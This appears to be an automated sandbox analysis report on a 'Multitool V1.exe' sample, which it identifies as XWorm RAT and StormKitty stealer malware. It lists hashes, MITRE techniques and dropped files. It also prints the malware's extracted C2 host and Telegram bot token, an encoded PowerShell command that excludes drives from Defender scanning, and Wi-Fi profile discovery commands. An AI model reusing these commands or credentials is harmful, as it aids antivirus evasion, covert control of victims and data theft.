Overview

overview

10

Static

static

3

Multitool V1.exe

windows7-x64

10

Multitool V1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    103s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 20:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Multitool V1.exe

  • Size

    307KB

  • MD5

    520f8ed0d73dbc6540fc80ac0c3847e1

  • SHA1

    81476c36b9ea1b6d18864b90310eb95ec20e5475

  • SHA256

    b148b01f921c8ee6aab7c5cb0b27b494f7ff5632f5a7dd2cbd1ccf206a5eb1ba

  • SHA512

    0981f5323101a214f1ee6e57f5d10b2136213ef88b4b44e1bd769114734679c2439f6338df585712137ef01684cc7b2658a3820f79da0b196c2e7a11bb06b2e4

  • SSDEEP

    6144:aMCOuWBJL5pt0UA8yTHsRRs6kkU7ezfQE62e3goypHp/3EvCcp3yVaG:aMCOucJL5pEDkU7Me3gpQTyVaG

Score
10/10
stormkittyxwormcollectiondefense_evasiondiscoverypersistenceprivilege_escalationratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:38960

metherium-38960.portmap.host:38960
Attributes
  • Install_directory

    %AppData%

  • install_file

    host.exe

  • telegram

    https://api.telegram.org/bot7283946415:AAGGT2xYjdDOFdezS7k5STvPS9SoyGQdKEg

Signatures

  • Detect Xworm Payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 2 IoCs
  • Stormkitty family
    stormkitty
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe
    "C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5044
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AbABlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUAB5AHQAaABvAG4AIABJAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAE4AZQBlAGQAZQBlAGQAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBwAGEAYwAjAD4A"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5460
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAcwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAcAB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAbgB5ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3536
    • C:\Users\Admin\AppData\Roaming\client.exe
      "C:\Users\Admin\AppData\Roaming\client.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:5516
    • C:\Users\Admin\AppData\Local\svchost.exe
      "C:\Users\Admin\AppData\Local\svchost.exe"
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:5740
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Wi-Fi Discovery
        • Suspicious use of WriteProcessMemory
        PID:5388
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1276
        • C:\Windows\SysWOW64\netsh.exe
          netsh wlan show profile
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:3952
        • C:\Windows\SysWOW64\findstr.exe
          findstr All
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1808
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 2396
        3⤵
        • Program crash
        PID:3336
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5496
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2988
        • C:\Windows\SysWOW64\netsh.exe
          netsh wlan show networks mode=bssid
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:1356
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5740 -ip 5740
    1⤵
      PID:4904

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Privilege Escalation

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Defense Evasion

    Obfuscated Files or Information

    1
    T1027

    Command Obfuscation

    1
    T1027.010

    Credential Access

    Credentials from Password Stores

    1
    T1555

    Credentials from Web Browsers

    1
    T1555.003

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Browser Information Discovery

    1
    T1217

    Query Registry

    2
    T1012

    System Information Discovery

    3
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    System Network Configuration Discovery

    1
    T1016

    Wi-Fi Discovery

    1
    T1016.002

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Email Collection

    1
    T1114

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      17KB

      MD5

      a644cefd69e03b6971ecc5d623102f73

      SHA1

      9fcbb8cdb45e1d63b6f8bd8ab8a34a26e3d43b8d

      SHA256

      e1b932c973022efea6126c8c9e0be9bfd93cf32302cbe0bed96c2351c33ec9b5

      SHA512

      47356f548dbf66eca81c84a22ace9df71a56fa9865e8f694ed39504a9f728de04526692695a93f22cfdb184ea04c8cfae9108425e3617d7e9409539cca654720

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxxrfrhp.1bq.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\svchost.exe
      Filesize

      213KB

      MD5

      23b83fe86a71cfba0d920fc658b3e010

      SHA1

      c9fd9d1dc68bcef1bfb2845d4cc35ea2a5b9d6dc

      SHA256

      6259f4d3310169e2b795e26a95ae21c7781abcb726322bc2eae0102546c816cf

      SHA512

      22a49771a71a7b4504635692d0d671223cfb4a5d5f8d892918291f1b733336b935926b67ae032f4797e3067f1d4f4aee4bf2ff2b0f2f607ea465ea6e87365ea3

      Download Submit

    • C:\Users\Admin\AppData\Roaming\client.exe
      Filesize

      79KB

      MD5

      10db01a500572f3468f4302068d6db1e

      SHA1

      90589a587d2ea36451a11e650a7b0041807b3be8

      SHA256

      cae10e709d8f1dcf7deee20ddc601be133961ed8542f8505d3a016bbedfc9e84

      SHA512

      c8cdd0eae61bc94f5978673e2bbda0b7916a87b7ab582036c3b95978b404f78202f3e8f31b32e050fd7298a682382b61db8c9b13828d97786ed052720fd3b8f9

      Download Submit

    • memory/3536-112-0x0000000007C90000-0x0000000007CA1000-memory.dmp

      Filesize

      68KB

      Download

    • memory/3536-95-0x00000000707B0000-0x00000000707FC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3536-118-0x0000000007DB0000-0x0000000007DB8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/3536-117-0x0000000007DD0000-0x0000000007DEA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3536-116-0x0000000007CE0000-0x0000000007CF4000-memory.dmp

      Filesize

      80KB

      Download

    • memory/3536-115-0x0000000007CD0000-0x0000000007CDE000-memory.dmp

      Filesize

      56KB

      Download

    • memory/3536-30-0x00000000060E0000-0x0000000006146000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3536-111-0x0000000007D10000-0x0000000007DA6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3536-27-0x0000000005950000-0x0000000005F78000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3536-109-0x0000000007B10000-0x0000000007B1A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3536-105-0x0000000006CC0000-0x0000000006CDE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3536-106-0x0000000007770000-0x0000000007813000-memory.dmp

      Filesize

      652KB

      Download

    • memory/3536-94-0x0000000007730000-0x0000000007762000-memory.dmp

      Filesize

      200KB

      Download

    • memory/5460-46-0x0000000005DD0000-0x0000000006124000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/5460-52-0x0000000006360000-0x00000000063AC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/5460-107-0x0000000007980000-0x0000000007FFA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/5460-108-0x0000000006870000-0x000000000688A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/5460-51-0x0000000006330000-0x000000000634E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/5460-110-0x00000000085B0000-0x0000000008B54000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/5460-25-0x0000000002D80000-0x0000000002DB6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/5460-31-0x0000000005610000-0x0000000005676000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5460-29-0x0000000005570000-0x0000000005592000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5516-121-0x00007FFE74940000-0x00007FFE75401000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5516-20-0x00007FFE74943000-0x00007FFE74945000-memory.dmp

      Filesize

      8KB

      Download

    • memory/5516-22-0x0000000000160000-0x000000000017A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/5516-114-0x00007FFE74940000-0x00007FFE75401000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5740-24-0x0000000000420000-0x000000000045C000-memory.dmp

      Filesize

      240KB

      Download

    • memory/5740-26-0x0000000005280000-0x0000000005292000-memory.dmp

      Filesize

      72KB

      Download

    • memory/5740-28-0x0000000005470000-0x0000000005632000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/5740-62-0x0000000007340000-0x00000000073D2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/5740-53-0x0000000006730000-0x0000000006C5C000-memory.dmp

      Filesize

      5.2MB

      Download